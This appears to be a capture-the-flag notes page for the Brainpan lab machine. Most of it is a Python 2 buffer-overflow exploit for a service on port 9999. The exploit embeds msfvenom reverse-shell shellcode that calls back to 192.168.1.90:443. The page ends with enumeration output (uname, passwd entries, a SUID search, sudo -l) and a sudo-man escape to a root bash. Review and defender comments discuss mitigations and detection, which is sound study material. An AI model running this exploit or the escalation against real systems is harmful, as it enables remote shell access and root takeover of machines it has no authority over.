192.168.1.97
#!/usr/bin/python
# Proof-of-concept stack-overflow client for the service listening on TCP/9999
# of the host named on the line above (the uname / os-release output further
# down this page is the system it was run against).
#
# Written for Python 2: `payload` below is a bytes literal while `buffer` is
# assembled from str literals. Under Python 2 those are the same type; under
# Python 3 the `+ payload` concatenation raises TypeError and s.send() would
# reject a str, so the script is not portable as it stands.
import socket
# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.90 LPORT=443 EXITFUNC=thread -f python -v payload -b "\x00"
# Shellcode as emitted by the msfvenom command above: a reverse shell that
# connects back to 192.168.1.90:443. The `-b "\x00"` option excludes NUL from
# the encoded bytes -- presumably because the receiving code stops copying at
# a NUL; that is inferred from the option, not verified here.
payload = b""
payload += b"\xda\xdc\xbe\x1b\xe9\x6c\x36\xd9\x74\x24\xf4\x58"
payload += b"\x33\xc9\xb1\x12\x31\x70\x17\x03\x70\x17\x83\xf3"
payload += b"\x15\x8e\xc3\x32\x3d\xb8\xcf\x67\x82\x14\x7a\x85"
payload += b"\x8d\x7a\xca\xef\x40\xfc\xb8\xb6\xea\xc2\x73\xc8"
payload += b"\x42\x44\x75\xa0\x94\x1e\x84\x6a\x7d\x5d\x87\x8b"
payload += b"\xc6\xe8\x66\x3b\x5e\xbb\x39\x68\x2c\x38\x33\x6f"
payload += b"\x9f\xbf\x11\x07\x4e\xef\xe6\xbf\xe6\xc0\x27\x5d"
payload += b"\x9e\x97\xdb\xf3\x33\x21\xfa\x43\xb8\xfc\x7d"
#buffer = 'A' * (528-len(payload)) + "DCBA"
# 311712F3 JMP ESP
# Message layout: 524 bytes of filler up to the saved return address, the
# JMP ESP address above written little-endian, a 16-byte NOP sled, the
# shellcode, then NOP padding.
#
# NOTE(review): the padding term does not account for the 16-byte sled, so the
# message is 1016 bytes long, not the 1000 the arithmetic suggests
# (524 + 4 + 16 + len(payload) + (1000 - 528 - len(payload)) = 1016).
#
# Defender notes: the technique depends on a fixed, non-randomised address for
# the JMP ESP gadget and on ESP pointing into executable memory; ASLR/PIE,
# a non-executable stack and stack canaries each break that chain (inferred
# from the technique -- the target's actual mitigations are not shown here).
# On the wire the message is easy to detect: a long run of 0x41 followed by
# 0x90 bytes in one ~1 KB send to port 9999.
buffer = 'A' * 524 + "\xF3\x12\x17\x31" + "\x90"*16 + payload + "\x90"*(1000-528-len(payload))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(('192.168.1.99', 9999))
s.connect(('192.168.1.97', 9999))
# The service's greeting is read and discarded; `data` is never used, so this
# recv() seems to be there only to wait for the banner before writing --
# presumably, confirm against the service.
data = s.recv(1024)
# Single unchecked send(): the return value (bytes actually written) is
# ignored, and no socket timeout is set, so a stalled peer blocks forever.
s.send(buffer)
s.close()
Linux brainpan 3.5.0-25-generic #39-Ubuntu SMP Mon Feb 25 19:02:34 UTC 2013 i686 i686 i686 GNU/Linux
PRETTY_NAME="Ubuntu quantal (12.10)"
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash
find / -perm -u=s 2>/dev/null
/usr/local/bin/validate
sudo -l
(root) NOPASSWD: /home/anansi/bin/anansi_util
sudo /home/anansi/bin/anansi_util manual man
!/bin/bash